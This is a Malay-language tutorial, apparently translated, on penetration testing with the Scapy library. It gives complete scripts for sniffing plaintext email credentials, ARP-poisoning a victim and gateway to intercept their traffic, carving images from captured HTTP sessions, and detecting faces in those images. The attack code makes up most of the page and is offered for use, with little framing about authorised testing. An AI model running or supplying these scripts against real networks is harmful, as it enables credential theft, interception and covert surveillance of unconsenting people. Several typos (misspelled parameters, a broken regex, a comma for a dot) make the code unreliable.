Rumah >pembangunan bahagian belakang >Tutorial Python >Bermula dengan Ujian Penembusan Python: Cara Menggunakan Perpustakaan Scapy
Scapy ialah modul Python dan atur cara interaktif yang digunakan untuk menghuraikan paket data rangkaian asas Program ini secara abstrak membungkus pemprosesan paket asas, menjadikan pemprosesan paket data rangkaian sangat mudah. Pustaka kelas ini boleh mempunyai julat kes penggunaan yang sangat luas dalam bidang keselamatan rangkaian dan boleh digunakan untuk pembangunan eksploitasi kerentanan, kebocoran data, pemantauan rangkaian, pengesanan pencerobohan dan analisis lalu lintas dan penangkapan. Scapy disepadukan dengan visualisasi data dan penjanaan laporan untuk memaparkan hasil dan data dengan mudah.
Scapy menyediakan fungsi antara muka yang dinamakan dengan ringkas Definisinya adalah seperti berikut:
sniff(filter = " ", iface = "any", prn = function, count = N)
Parameter penapis membolehkan anda menentukan Penapis Paket Berkeley. (BPF) digunakan untuk menapis paket yang dihidu oleh Scapy Anda juga boleh membiarkan parameter ini kosong untuk menunjukkan bahawa semua paket akan dihidu.
Parameter iface digunakan untuk menentukan kad rangkaian yang akan dihidu oleh penghidu Jika tidak ditetapkan, semua kad rangkaian akan dihidu secara lalai. Parameter prn digunakan untuk menentukan fungsi panggil balik Setiap kali paket yang memenuhi syarat penapisan ditemui, penghidu akan menghantar paket ke fungsi panggil balik ini. Ini adalah satu-satunya parameter yang diterima oleh fungsi ini. Parameter kiraan boleh digunakan untuk menentukan berapa banyak paket yang anda ingin hidu Jika dibiarkan kosong, Scapy akan terus menghidu.
mail_sniffer.py:
from scapy.all import sniff def packet_callback(packet): print(packet.show()) def main(): sniff(pro=packet_callback, count=1) if __name__ == '__main__': main()
Dalam penghidu mudah ini, ia hanya menghidu arahan yang berkaitan dengan protokol peti mel.
Seterusnya kami akan menambah penapis dan kod fungsi panggil balik untuk menangkap data yang berkaitan dengan pengesahan akaun e-mel dengan cara yang disasarkan.
Pertama, kami akan menyediakan penapis paket untuk memastikan penghidu hanya menunjukkan paket yang menarik minat kami. Kami akan menggunakan sintaks BPF (juga dikenali sebagai sintaks gaya Wireshark) untuk menulis penapis. Anda boleh menggunakan sintaks ini dalam alatan seperti tcpdump dan Wireshark. Mari kita bincangkan tentang sintaks BPF asas dahulu. Dalam sintaks BPF, tiga jenis maklumat boleh digunakan: deskriptor (seperti alamat hos tertentu, nama kad rangkaian atau nombor port), arah aliran data dan protokol komunikasi, seperti yang ditunjukkan dalam rajah. Anda bebas untuk menambah atau meninggalkan jenis, arahan atau protokol tertentu bergantung pada data yang anda cari.
Mari kita tulis BPF dahulu:
from scapy.all import sniff, TCP, IP #the packet callback def packet_callback(packet): if packet[TCP].payload: mypacket = str(packet[TCP].paylaod) if 'user' in mypacket.lower() or 'pass' in mypacket.lower(): print(f"[*] Destination: {packet[IP].dst}") print(f"[*] {str(packet[TCP].payload)}") def main(): #fire up the sniffer sniff(filter='tcp port 110 or tcp port 25 or tcp port 143',prn=packet_callback, store=0) #监听邮件协议常用端口 #新参数store,把它设为0以后,Scapy就不会将任何数据包保留在内存里 if __name__ == '__main__': main()
Logik: memperdayakan peranti sasaran supaya mempercayai kami adalah miliknya get laluan; kemudian ia memalsukan get laluan dan memberitahunya bahawa semua trafik yang dituju untuk peranti sasaran mesti dimajukan kepada kami. Setiap peranti pada rangkaian mengekalkan cache ARP, yang merekodkan surat-menyurat antara alamat MAC dan alamat IP pada rangkaian tempatan dalam tempoh baru-baru ini. Untuk melaksanakan serangan ini, kami akan meracuni cache ARP ini, iaitu memasukkan rekod rekaan kami ke dalam cache.
Perhatikan bahawa mesin sasaran percubaan ialah mac
arper.py:
from multiprocessing import Process from scapy.all import (ARP, Ether, conf, get_if_hwaddr, send, sniff, sndrcv, srp, wrpcap) import os import sys import time def get_mac(targetip): packet = Ether(dst='ff:ff:ff:ff:ff:ff')/ARP(op="who-has", pdst=targetip) resp, _= srp(packet, timeout=2, retry=10, verbose=False) for _, r in resp: return r[Ether].src return None class Arper: def __init__(self, victim, gateway, interface='en0'): self.victim = victim self.victimmac = get_mac(victim) self.gateway = gateway self.gatewaymac = get_mac(gateway) self.interface = interface conf.iface = interface conf.verb = 0 print(f'Initialized {interface}:') print(f'Gateway ({gateway}) is at {self.gateway}') print(f'Victim ({victim}) is at {self.gatewaymac}') print('_'*30) def run(self): self.poison_thread = Process(target=self.poison) self.poison_thread.start() self.sniff_thread = Process(target=self.sniff) self.sniff_thread.start() def poison(self): poison_victim = ARP() poison_victim.op = 2 poison_victim.psrc = self.gateway poison_victim.pdst = self.victim poison_victim.hwdst = self.victimmac print(f'ip src: {poison_victim.psrc}') print(f'ip dst: {poison_victim.pdst}') print(f'mac dst: {poison_victim.hwdst}') print(f'mac src: {poison_victim.hwsrc}') print(poison_victim.summary()) print('_'*30) poison_gateway = ARP() poison_gateway.op = 2 poison_gateway.psrc = self,victim poison_gateway.pdst = self.gateway poison_gateway.hwdst = self.gatewaymac print(f'ip src: {poison_gateway.psrc}') print(f'ip dst: {poison_gateway.pdst}') print(f'mac dst: {poison_gateway.hwdst}') print(f'mac_src: {poison_gateway.hwsrc}') print(poison_gateway.summary()) print('_'*30) print(f'Beginning the ARP poison. [CTRL -C to stop]') while True: sys.stdout.write('.') sys.stdout.flush() try: send(poison_victim) send(poison_gateway) except KeyboardInterrupt: self.restore() sys.exit() else: time.sleep(2) def sniff(self, count=200): time.sleep(5) print(f'Sniffing {count} packets') bpf_filter = "ip host %s" % victim packets = sniff(count=count, filter=bpf_filter, ifcae=self.interface) wrpcap('arper.pcap', packets) print('Got the packets') self.restore() self.poison_thread.terminate() print('Finished') def restore(self): print('Restoring ARP tables...') send(ARP( op=2, psrc=self.gateway, hwsrc=self.gatewaymac, pdst=self.victim, hwdst='ff:ff:ff:ff:ff:ff'), count=5) send(ARP( op=2, psrc=self.victim, hwsrc=self.victimmac, pdst=self.gateway, hwdst='ff:ff:ff:ff:ff:ff'), count=5) if __name__ == '__main__': (victim, gateway, interface) = (sys.argv[1], sys.argv[2], sys.argv[3]) myarp = Arper(victim, gateway, interface) myarp.run()
recapper.py:
from scapy.all import TCP, rdpcap import collections import os import re import sys import zlib OUTDIR = '/root/Desktop/pictures' PCAPS = '/root/Downloads' Response = collections.namedtuple('Response', ['header','payload']) def get_header(payload): try: header_raw = payload[:payload.index(b'\r\n\r\n')+2] except ValueError: sys.stdout.write('_') sys.stdout.flush() return None header = dict(re.findall(r'?P<name>.*?): (?P<value>.*?)\r\n', header_raw.decode())) if 'Content-Type' not in header: return None return header def extract_content(Response, content_name='image'): content, content_type = None, None if content_name in Response.header['Content-Type']: content_type = Response.header['Content-Type'].split('/')[1] content = Response.payload[Response.payload.index(b'\r\n\r\n')+4:] if 'Content-Encoding' in Response.header: if Response.header['Content-Encoding'] == "gzip": content = zlib.decompress(Response.payload, zlib.MAX_wbits | 32) elif Response.header['Content-Encoding'] == "deflate": content = zlib.decompress(Response.payload) return content, content_type class Recapper: def __init__(self, fname): pcap = rdpcap(fname) self.session = pcap.session() self.responses = list() def get_responses(self): for session in self.session: payload = b'' for packet in self.session[session]: try: if packet[TCP].dport == 80 or packet[TCP].sport == 80: payload += bytes(packet[TCP].payload) except IndexError: sys.stdout.write('x') sys.stdout.flush() if payload: header = get_header(payload) if header is None: continue self.responses.append(Response(header=header, payload=payload)) def write(self, content_name): for i, response in enumerate(self.responses): content, content_type = extract_content(response, content_name) if content and content_type: fname = os.path.join(OUTDIR, f'ex_{i}.{content_type}') print(f'Writing {fname}') with open(fname, 'wb') as f: f.write(content) if __name__ == '__main__': pfile = os.path.join(PCAPS, 'pcap.pcap') recapper = Recapper(pfile) recapper.get_responses() recapper.write('image')
Sekiranya kita mendapat gambar, maka kita perlu menganalisis gambar tersebut dan menyemak setiap gambar untuk mengesahkan sama ada terdapat wajah di dalamnya. Untuk setiap imej yang mengandungi muka, kami melukis kotak di sekeliling muka dan menyimpannya sebagai imej baharu.
detector.py:
import cv2 import os ROOT = '/root/Desktop/pictures' FACES = '/root/Desktop/faces' TRAIN = '/root/Desktop/training' def detect(srcdir=ROOT, tgtdir=FACES, train_dir=TRAIN): for fname in os.listdir(srcdir): if not fname.upper().endswith('.JPG'): continue fullname = os.path.join(srcdir, fname) newname = os.path.join(tgtdir, fname) img = cv2.imread(fullname) if img is None: continue gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY) training = os.path.join(train_dir, 'haarcascade_frontalface_alt.xml') cascade = cv2.CascadeClassifier(training) rects = cascade.detectMultiScale(gray, 1.3,5) try: if rects.any(): print('Got a face') rects[:, 2:] += rects[:, :2] except AttributeError: print(f'No faces fount in {fname}') continue # highlight the faces in the image for x1, y1, x2, y2 in rects: cv2.rectangle(img, (x1, y1), (x2, y2), (127, 255, 0), 2) cv2.imwrite(newname, img) if name == '__main__': detect()
Atas ialah kandungan terperinci Bermula dengan Ujian Penembusan Python: Cara Menggunakan Perpustakaan Scapy. Untuk maklumat lanjut, sila ikut artikel berkaitan lain di laman web China PHP!